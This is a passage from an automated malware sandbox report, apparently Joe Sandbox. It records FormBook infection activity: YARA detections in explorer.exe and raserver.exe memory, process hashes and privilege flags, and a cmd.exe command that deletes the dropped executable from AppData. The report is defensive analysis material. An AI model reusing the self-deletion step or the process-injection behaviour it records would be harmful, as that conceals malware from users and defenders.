                                              Start date:27/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Analysis Process: raserver.exe PID: 344 Parent PID: 1764

                                              General

                                              Start time:16:38:42
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\raserver.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                              Imagebase:0x740000
                                              File size:101888 bytes
                                              MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Analysis Process: cmd.exe PID: 2584 Parent PID: 344

                                              General

                                              Start time:16:38:46
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\AppData\Roaming\villar8681.exe'
                                              Imagebase:0x49ee0000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >